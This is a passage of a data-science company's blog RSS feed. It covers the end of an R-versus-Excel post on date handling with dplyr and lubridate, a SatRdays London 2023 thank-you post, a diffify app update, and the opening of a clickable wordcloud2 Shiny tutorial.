operations on them such as subtraction in order to calculate duration.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Vectorised operations: R allows us to apply calculations to the entire
column at once.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Data Manipulation: The {dplyr} data manipulation package in R makes it
easier to perform complex tasks on the entire dataset, such as
aggregating the data based on country and then determining the average
duration.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;By utilising R’s ecosystem of packages, such as {lubridate} for
handling dates, we can perform complex date calculations efficiently and
easily.&lt;/p&gt;
&lt;h4 id="using-dplyr-and-lubridate"&gt;Using {dplyr} and {lubridate}&lt;/h4&gt;
&lt;p&gt;Let’s say we wanted to find the average number of employees on set for
movies that were released in the year with the highest average profit.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;lubridate&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Extract the year from the start_date column&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;movies &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; movies_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(start_year &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;year&lt;/span&gt;(start_date))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Calculate the average highest profit per movie for each year&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;profit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; movies &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(start_year) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(avg_profit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(Highest_profit))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Determine the year with the highest average profit&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;profit_year &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; profit &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(avg_profit &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;max&lt;/span&gt;(avg_profit)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pull&lt;/span&gt;(start_year)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;profit_year
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 2014&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now let’s try to visualise how we would approach this task in Excel. To
replicate the task above, we would need multiple functions such as
&lt;code&gt;MAX()&lt;/code&gt;, &lt;code&gt;AVERAGEIFS()&lt;/code&gt; as well as date manipulation functions in order
to extract the relevant data before calculating averages. Excel’s
formula-based design and approach might require multiple steps and
complex formulas, which makes the process time-consuming and prone to
errors. Handling dates in Excel is a challenge on its own, so while it
is possible to perform these calculations in Excel, it may not be as
efficient and straightforward as in R.&lt;/p&gt;
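&lt;p&gt;The R code above stops once the most profitable year has been identified.
One possible way to finish the stated task, averaging the number of
employees for movies starting in that year, is sketched below. It assumes
{lubridate} and {dplyr} are installed. The names &lt;code&gt;movies_small&lt;/code&gt; and
&lt;code&gt;best_year&lt;/code&gt; are hypothetical, and the data frame simply re-enters three
columns from the table printed earlier so that the example runs on its own.&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;lubridate&amp;#34;)
library(&amp;#34;dplyr&amp;#34;)

# Only the three columns needed here, copied from the printed table
movies_small = data.frame(
  start_date = as_date(c(&amp;#34;2011-01-16&amp;#34;, &amp;#34;2012-03-21&amp;#34;, &amp;#34;2013-01-01&amp;#34;,
                         &amp;#34;2013-01-04&amp;#34;, &amp;#34;2013-01-28&amp;#34;, &amp;#34;2014-01-01&amp;#34;)),
  Highest_profit = c(100, 150, 300, 130, 177, 350),
  no_employees = c(1500, 2000, 4000, 4020, 5300, 3150)
) |&amp;gt;
  mutate(start_year = year(start_date))

# Year with the highest average profit (same logic as above)
best_year = movies_small |&amp;gt;
  group_by(start_year) |&amp;gt;
  summarise(avg_profit = mean(Highest_profit)) |&amp;gt;
  filter(avg_profit == max(avg_profit)) |&amp;gt;
  pull(start_year)

# Average number of employees for movies starting in that year
movies_small |&amp;gt;
  filter(start_year == best_year) |&amp;gt;
  summarise(avg_employees = mean(no_employees)) |&amp;gt;
  pull(avg_employees)
## [1] 3150
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Only one movie in this small dataset starts in 2014, so the average is
simply that movie’s employee count.&lt;/p&gt;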
&lt;p&gt;Both R and Excel have their strengths in data manipulation and analysis.
Excel is commonly used due to its user-friendly, easily accessible
system, making it suitable for quick, basic tasks. However, when it
comes to complex data analysis and advanced programming capabilities, R
proves to be the superior choice. R, with its packages such as
{lubridate} and {dplyr}, provides intuitive syntax specifically designed
for handling dates. Its flexibility allows for seamless integration with
other statistical and visualisation packages. The ability to write
reproducible scripts in R enhances collaboration, documentation, and
automation.&lt;/p&gt;
&lt;p&gt;In addition to the advantages of using {lubridate}, there are also
several base R datetime functions that provide flexibility in handling
dates. Functions such as &lt;code&gt;as.Date()&lt;/code&gt; and &lt;code&gt;difftime()&lt;/code&gt; allow for date
manipulations. Base R provides a solid foundation for date operations,
and when combined with additional packages like {lubridate}, it offers a
powerful suite of tools for working with dates.&lt;/p&gt;
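&lt;p&gt;As a small sketch of the base R route, the interval example from earlier
can be reproduced with &lt;code&gt;as.Date()&lt;/code&gt; and &lt;code&gt;difftime()&lt;/code&gt; alone. The
variable name &lt;code&gt;diff_days&lt;/code&gt; is an illustrative assumption.&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r" data-lang="r"&gt;start_date = as.Date(&amp;#34;2023-01-18&amp;#34;)
end_date = as.Date(&amp;#34;2023-05-16&amp;#34;)

# difftime() returns a &amp;#34;difftime&amp;#34; object that carries its units
diff_days = difftime(end_date, start_date, units = &amp;#34;days&amp;#34;)
diff_days
## Time difference of 118 days

# Convert to a plain number when needed for further calculations
as.numeric(diff_days, units = &amp;#34;days&amp;#34;)
## [1] 118

# Base R can also extract components via format()
format(end_date, &amp;#34;%Y&amp;#34;)
## [1] &amp;#34;2023&amp;#34;
&lt;/code&gt;&lt;/pre&gt;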
&lt;p&gt;While Excel remains useful for basic tasks, R’s approach makes it the
preferred tool for complex data manipulation and analysis. Its
flexibility, extensive community support, and comprehensive packages
make R the go-to choice for handling date operations, as well as other
advanced data analysis tasks.&lt;/p&gt;
&lt;p&gt;If you’re interested in learning more about using R for data analysis,
take a look at our &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;training
course&lt;/a&gt; offerings;
there’s something for all levels.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/date-r-excel-datetimes-transition/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRdays London 2023: Thanks for coming!</title><link>https://www.jumpingrivers.com/blog/satrdays-london-2023-conference-rstats-thanks-for-coming/</link><pubDate>Thu, 11 May 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-london-2023-conference-rstats-thanks-for-coming/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2023-conference-rstats-thanks-for-coming/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-london-2023-conference-rstats-thanks-for-coming/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;SatRdays returned to London last month, with a day packed full of talks from expert speakers across a variety of sectors! We&amp;rsquo;d like to take this opportunity to say a huge thank you to everybody involved in making the day a success!&lt;/p&gt;
&lt;h3 id="speakers"&gt;Speakers&lt;/h3&gt;
&lt;p&gt;Huge thanks to all of our speakers for your contributions to the day. It was great to see such a varied line-up of talks, covering everything from Sidekicks of the Tidyverse, to Sustainability and EDI in the R Project, with much more in between. We&amp;rsquo;ll be adding any available talk materials to the &lt;a href="https://satrday-london-2023.jumpingrivers.com/" rel="external"&gt;SatRdays website&lt;/a&gt; in the coming days.&lt;/p&gt;
&lt;h4 id="keynotes"&gt;Keynotes&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.linkedin.com/in/juliasilge/" rel="external"&gt;Julia Silge&lt;/a&gt; (&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;): What is &amp;ldquo;production&amp;rdquo; anyway? MLOps for the curious&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.linkedin.com/in/olihawkins/" rel="external"&gt;Oli Hawkins&lt;/a&gt; (&lt;a href="https://www.ft.com/" rel="external"&gt;Financial Times&lt;/a&gt;): Why R is good for journalism&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="contributed-talks"&gt;Contributed talks&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.linkedin.com/in/michael-stevens-55a523b0/" rel="external"&gt;Michael Stevens&lt;/a&gt; &amp;amp; &lt;a href="https://www.linkedin.com/in/botanagin" rel="external"&gt;Botan Ağın&lt;/a&gt; (&lt;a href="https://samknows.com/" rel="external"&gt;SamKnows&lt;/a&gt;): AutRmatic reporting: billions of internet measurements, hundreds of reports and one repository to rule them all&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/russHyde" rel="external"&gt;Russ Hyde&lt;/a&gt; (&lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;): Does code quality even matter in data science?&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.linkedin.com/in/EllaKaye/" rel="external"&gt;Ella Kaye&lt;/a&gt; &amp;amp; &lt;a href="https://www.linkedin.com/in/heathrturnr/" rel="external"&gt;Heather Turner&lt;/a&gt; (&lt;a href="https://warwick.ac.uk/" rel="external"&gt;University of Warwick&lt;/a&gt;): Sustainability and EDI (Equality, Diversity and Inclusion) in the R Project&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.linkedin.com/in/datawookie/" rel="external"&gt;Andrew Collier&lt;/a&gt; (presenter) &amp;amp; &lt;a href="https://www.linkedin.com/in/bianca-peterson/" rel="external"&gt;Bianca Peterson&lt;/a&gt; (&lt;a href="https://www.fathomdata.dev/" rel="external"&gt;Fathom Data&lt;/a&gt;): Sidekicks of the Tidyverse&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.linkedin.com/in/jack-davison/" rel="external"&gt;Jack Davison&lt;/a&gt; (&lt;a href="https://www.ricardo.com/en/services/environmental-consulting" rel="external"&gt;Ricardo Energy &amp;amp; Environment&lt;/a&gt;): “Put it on a map!” – Developments in Air Quality Data Analysis&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.linkedin.com/in/vyara-apostolova-5a62a4136/" rel="external"&gt;Vyara Apostolova&lt;/a&gt; &amp;amp; &lt;a href="https://www.linkedin.com/in/laura-cole-7b7397123/" rel="external"&gt;Laura Cole&lt;/a&gt; (&lt;a href="https://www.nao.org.uk/" rel="external"&gt;National Audit Office&lt;/a&gt;): &lt;em&gt;ScRutinising government spending&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-satrdays-london-conference-rstats-thanks-for-coming"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;h3 id="sponsors"&gt;Sponsors&lt;/h3&gt;
&lt;p&gt;Thanks again to our sponsors for supporting the day in various ways!&lt;/p&gt;
&lt;h4 id="cusp-london"&gt;&lt;a href="https://cusplondon.ac.uk/" rel="external"&gt;CUSP London&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;The Centre for Urban Science and Progress (CUSP) London provided our incredible venue, Bush House London, as well as all of the AV support and catering throughout the day.&lt;/p&gt;
&lt;p&gt;Based in London, UK, their mission is to support interdisciplinary research and innovation using Data Science in and for London.&lt;/p&gt;
&lt;h4 id="jumping-rivers"&gt;&lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;If you&amp;rsquo;re here, you probably already know who we are, but just in case: we&amp;rsquo;re Jumping Rivers and we were the event organisers for SatRdays 2023.&lt;/p&gt;
&lt;p&gt;Jumping Rivers is an analytics company whose passion is data and machine learning. We help our clients move from data storage to data insights.&lt;/p&gt;
&lt;h4 id="posit"&gt;&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Posit supported the conference in many ways, including sending us our keynote speaker, Julia Silge, all the way over from the US!&lt;/p&gt;
&lt;p&gt;Posit aim to create open-source software for data science, scientific research, and technical communication, to enhance the production and consumption of knowledge by everyone, regardless of economic means.&lt;/p&gt;
&lt;h4 id="r-consortium"&gt;&lt;a href="https://www.r-consortium.org/" rel="external"&gt;R Consortium&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;The R Consortium is the organisation behind SatRdays as a worldwide event.&lt;/p&gt;
&lt;p&gt;The central mission of the R Consortium is to work with and provide support to the R Foundation and to the key organizations developing, maintaining, distributing and using R software through the identification, development and implementation of infrastructure projects.&lt;/p&gt;
&lt;h3 id="you"&gt;You&lt;/h3&gt;
&lt;p&gt;Of course, a conference would not work with nobody there to see it, so thank you to all of our attendees, both in-person and virtual! We hope that you enjoyed the day as much as we did, and that you got a chance to network and learn and maybe share a bit of your own knowledge too!&lt;/p&gt;
&lt;h3 id="whats-next"&gt;What&amp;rsquo;s next?&lt;/h3&gt;
&lt;h4 id="satrdays-recordings"&gt;SatRdays recordings&lt;/h4&gt;
&lt;p&gt;Keep an eye out here and on our social media, as we&amp;rsquo;ll be sharing the recordings of some of the talks, so if you missed out on the day, you don&amp;rsquo;t have to miss out completely!&lt;/p&gt;
&lt;h4 id="shiny-in-production-confererence"&gt;Shiny in Production confererence&lt;/h4&gt;
&lt;p&gt;We also have our &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production&lt;/a&gt; conference coming up later this year! This conference takes a look at shiny and other web based R packages, and includes an afternoon of workshops as well as a day of talks from subject experts. Take a look at the conference website to find out what we have lined up so far, and keep an eye out on our social media for further announcements.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2023-conference-rstats-thanks-for-coming/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Diffify - the anniversary update!</title><link>https://www.jumpingrivers.com/blog/diffify-anniversary-update-r-python/</link><pubDate>Tue, 02 May 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/diffify-anniversary-update-r-python/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/diffify-anniversary-update-r-python/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/diffify-anniversary-update-r-python/birthday_cake.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;ve just passed an important milestone for &lt;a href="https://diffify.com/" rel="external"&gt;diffify&lt;/a&gt;:
our app for tracking Python and R package releases has just turned 1 year old!
To mark this exciting occasion we are delighted to announce an &amp;ldquo;anniversary
update&amp;rdquo; featuring numerous quality of life improvements. This post will outline
the latest changes and tease some exciting developments in the works…&lt;/p&gt;
&lt;p&gt;First, though, we would like to take this opportunity to thank everyone who
continues to use the app and welcome any new users to the service.
Your continued feedback via &lt;a href="https://twitter.com/jumping_uk" rel="external"&gt;social media&lt;/a&gt; and
&lt;a href="https://github.com/jumpingrivers/diffify/issues" rel="external"&gt;GitHub&lt;/a&gt; has played a major
role in shaping the last year of development.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-diffify-anniversary-update-r-python"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;h3 id="anniversary-update"&gt;Anniversary update&lt;/h3&gt;
&lt;p&gt;Let&amp;rsquo;s start by going through the changes introduced by today&amp;rsquo;s anniversary
update!&lt;/p&gt;
&lt;h4 id="latest-package-releases"&gt;Latest package releases&lt;/h4&gt;
&lt;p&gt;When you navigate to the &lt;a href="https://diffify.com/R" rel="external"&gt;R&lt;/a&gt; and
&lt;a href="https://diffify.com/python" rel="external"&gt;Python&lt;/a&gt; homepages, you will notice a new
window titled &amp;ldquo;Latest Releases and Updates&amp;rdquo;:&lt;/p&gt;
&lt;img src="latest_updates_screenshot.png" alt="A screenshot of the R packages homepage: As before, there is a dropdown to the left for selecting an R package. There is also a new window to the right titled 'Latest Releases and Updates', which shows a list of new and updated packages that have been published in the past day or so."/&gt;
&lt;p&gt;This lists any new or updated packages that have been published in the past day
or so. See a package that you&amp;rsquo;re using? Just click on it and you will be
redirected to the diffify summary with the latest changes.&lt;/p&gt;
&lt;h4 id="package-dependencies"&gt;Package dependencies&lt;/h4&gt;
&lt;p&gt;In response to user feedback, we have added cross-links for package
dependencies. Let&amp;rsquo;s check out the &lt;a href="https://diffify.com/python/matplotlib/3.6.3/3.7.1" rel="external"&gt;changes&lt;/a&gt;
between versions 3.6.3 and 3.7.1 of the &lt;strong&gt;matplotlib&lt;/strong&gt; package:&lt;/p&gt;
&lt;img src="dependencies_screenshot.png" alt="A screenshot of the package dependencies window: This is showing changes to the required dependencies between versions 3.6.3 and 3.7.1 of the matplotlib package. A new link icon is visible next to the name of each package. Clicking this would redirect users to the diffify summaries for those packages."/&gt;
&lt;p&gt;We see that the version requirement has changed for the &lt;strong&gt;numpy&lt;/strong&gt; and
&lt;strong&gt;pyparsing&lt;/strong&gt; packages. You may now be wondering what&amp;rsquo;s changed in the latest
versions of &lt;em&gt;those&lt;/em&gt; packages? Just click the link icons and that will open a new
tab with the two latest versions diffed.&lt;/p&gt;
&lt;p&gt;Quick disclaimer that not all package dependencies will have cross-links. We can
only provide cross-links for packages that are actually tracked by diffify,
which includes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;All R packages published on &lt;a href="https://cran.r-project.org/" rel="external"&gt;CRAN&lt;/a&gt; (this does
&lt;em&gt;not&lt;/em&gt; include base-R packages)&lt;/li&gt;
&lt;li&gt;Any Python package that is in the &lt;a href="https://hugovk.github.io/top-pypi-packages/" rel="external"&gt;top 5000 PyPI packages&lt;/a&gt;
list and has an accessible wheel file on &lt;a href="https://pypi.org/" rel="external"&gt;PyPI&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="news-layout"&gt;News layout&lt;/h4&gt;
&lt;p&gt;We have made some changes to the way we display news for R packages. Let&amp;rsquo;s check
out the &lt;a href="https://diffify.com/R/dplyr/1.0.7/1.0.10" rel="external"&gt;changes&lt;/a&gt; between versions
1.0.7 and 1.0.10 of &lt;strong&gt;{dplyr}&lt;/strong&gt;. As before, the news can be accessed for all
versions since (but not including) the earlier version:&lt;/p&gt;
&lt;img src="news_screenshot.png" alt="A screenshot of the updated news window: Tabs are displayed for versions 1.0.8, 1.0.9 and 1.0.10 for the {dplyr} package. The 1.0.8 and 1.0.10 tabs have been expanded so that the news for these versions is displayed."/&gt;
&lt;p&gt;However, you&amp;rsquo;ll notice we now have an accordion layout with the version tabs
listed vertically. You are now free to have as many of these versions open as
you like, and scrolling through these will feel just like scrolling through a
NEWS.md file.&lt;/p&gt;
&lt;h4 id="dark-theme"&gt;Dark theme&lt;/h4&gt;
&lt;p&gt;Last but not least … we now have a dark theme! Just click the theme dropdown
at the top of the page, select &amp;ldquo;Theme: Dark&amp;rdquo; and enjoy this lower-light setting:&lt;/p&gt;
&lt;img src="dark_theme_screenshot.png" alt="A screenshot of the diffify webpage with the new dark theme applied: The webpage displays some changes between versions 1.1.0 and 1.1.2 of the {dplyr} package. With the dark theme applied, the background is now darkened and the colour of the text has been changed to white to maintain a high contrast."/&gt;
&lt;p&gt;On the topic of themes, we have also improved the default theme by incorporating
beneficial features from the old boosted contrast theme.&lt;/p&gt;
&lt;h3 id="other-recent-changes"&gt;Other recent changes&lt;/h3&gt;
&lt;p&gt;In case you missed them, here are some other improvements that have been made
over the past six months or so.&lt;/p&gt;
&lt;h4 id="maintainer-section"&gt;Maintainer section&lt;/h4&gt;
&lt;p&gt;Just below the version dropdowns you will notice a new maintainer section:&lt;/p&gt;
&lt;img src="maintainer_screenshot.png" alt="A screenshot of the expanded maintainer section located below the version dropdowns: This contains links to raise an issue and get a badge."/&gt;
&lt;p&gt;If you maintain a package that is featured on diffify, you can generate a
diffify badge to copy into your GitHub repository. Simply click &amp;ldquo;Get a badge&amp;rdquo;,
then paste the copied HTML code directly into an HTML or Markdown file (perhaps
your package README).&lt;/p&gt;
&lt;p&gt;As an example, here&amp;rsquo;s the badge generated for the &lt;strong&gt;{dplyr}&lt;/strong&gt; package:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://diffify.com/R/dplyr" target="_blank"&gt;&lt;img src="https://diffify.com/diffify-badge.svg" alt="The diffify page for the R package {dplyr}" style="width: 100px; max-width: 100%;"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Clicking this icon will redirect users to the &lt;strong&gt;{dplyr}&lt;/strong&gt; page on diffify.&lt;/p&gt;
&lt;h4 id="python-content"&gt;Python content&lt;/h4&gt;
&lt;p&gt;We have expanded the list of Python packages that are tracked by diffify to
cover the &lt;a href="https://hugovk.github.io/top-pypi-packages/" rel="external"&gt;top 5000 packages on PyPI&lt;/a&gt;
according to download counts. We are still only tracking packages that have a
wheel file on PyPI, but will look to expand this to zips and tars within the
next month.&lt;/p&gt;
&lt;h4 id="usability"&gt;Usability&lt;/h4&gt;
&lt;p&gt;We are continuing to optimise the usability and performance of the app. Recent
improvements include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;text wrapping on narrow screens&lt;/li&gt;
&lt;li&gt;smoother transitions using the backward and forward navigation buttons&lt;/li&gt;
&lt;li&gt;improvements to keyboard navigation.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="exciting-times-ahead"&gt;Exciting times ahead…&lt;/h3&gt;
&lt;p&gt;In the coming months we will be releasing two public APIs to accompany diffify.
We will release dedicated blogs to coincide with those releases, but here&amp;rsquo;s a
quick overview to whet your appetite:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Next month we will release an API which will allow R package authors to submit
development versions to diffify. Package authors and users will then be able
to use diffify to view changes between published versions and the latest
development version.&lt;/li&gt;
&lt;li&gt;The second API, which will take a little longer to develop, will act as a
command-line interface for submitting queries to diffify. This will allow you
to check whether installing the latest version of a package could break your
code.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can&amp;rsquo;t wait to share more when these are released!&lt;/p&gt;
&lt;h3 id="wrapping-up"&gt;Wrapping up&lt;/h3&gt;
&lt;p&gt;That&amp;rsquo;s all from us for today. Thanks again for your continued feedback on the
app, and please stay tuned for more updates…&lt;/p&gt;
&lt;p&gt;For further reading, you can check out our previous blog posts
&lt;a href="https://www.jumpingrivers.com/tags/diffify/" rel="external"&gt;here&lt;/a&gt;!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/diffify-anniversary-update-r-python/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>How to create a clickable word cloud with wordcloud2 and Shiny</title><link>https://www.jumpingrivers.com/blog/r-clickable-wordcloud-javascript-shiny/</link><pubDate>Thu, 27 Apr 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-clickable-wordcloud-javascript-shiny/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-clickable-wordcloud-javascript-shiny/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-clickable-wordcloud-javascript-shiny/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Word clouds are a visual representation of text data where words are
arranged in a cluster, with the size of each word reflecting its
frequency or importance in the data set. Word clouds are a great way of
displaying the most prominent topics or keywords in free text data
obtained from websites, social media feeds, reviews, articles and more.
If you want to learn more about working with unstructured text data, we
recommend attending our &lt;a href="https://www.jumpingrivers.com/training/course/r-text-mining-tidyverse-stringr-tidytext/" rel="external"&gt;Text Mining in
R&lt;/a&gt;
course.&lt;/p&gt;
&lt;p&gt;Usually, a word cloud will be used solely as an output. But what if you
wanted to use a word cloud as an input? For example, let’s say we
visualised the most common words in reviews for a hotel. Imagine we
could then click on a specific word in the word cloud, and it would then
show us only the reviews which mention that specific word. Useful,
right?&lt;/p&gt;
&lt;p&gt;This blog will take you through creating a clickable word cloud in a
Shiny app, where the user can click any word in the word cloud to filter
an output table. We will be using the &lt;a href="https://github.com/rfordatascience/tidytuesday/blob/master/data/2021/2021-04-20/readme.md" rel="external"&gt;2021 TidyTuesday Netflix
titles&lt;/a&gt;
data set and the
&lt;a href="https://cran.r-project.org/web/packages/wordcloud2/vignettes/wordcloud.html" rel="external"&gt;{wordcloud2}&lt;/a&gt;
package to create our word cloud. We will then integrate it in a Shiny
app with a reactively filtered &lt;a href="https://rstudio.github.io/DT/" rel="external"&gt;{DT}&lt;/a&gt;
table output.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-clickable-wordcloud-javascript-shiny"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="creating-a-word-cloud-with-wordcloud2"&gt;Creating a word cloud with {wordcloud2}&lt;/h3&gt;
&lt;p&gt;{wordcloud2} is an R package which creates HTML-based word clouds, based
on &lt;a href="https://github.com/timdream/wordcloud2.js" rel="external"&gt;wordcloud2.js&lt;/a&gt;. The main
function is simply called &lt;code&gt;wordcloud2()&lt;/code&gt; and takes a word count data
frame as an input, i.e. one column containing the words and one column
containing the frequencies of those words.&lt;/p&gt;
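&lt;p&gt;As a minimal sketch of that input shape, here is a toy word count data
frame built by hand. The words and counts are invented for illustration, and
the column names &lt;code&gt;word&lt;/code&gt; and &lt;code&gt;n&lt;/code&gt; are our own choice; to
our understanding, &lt;code&gt;wordcloud2()&lt;/code&gt; reads the first column as the
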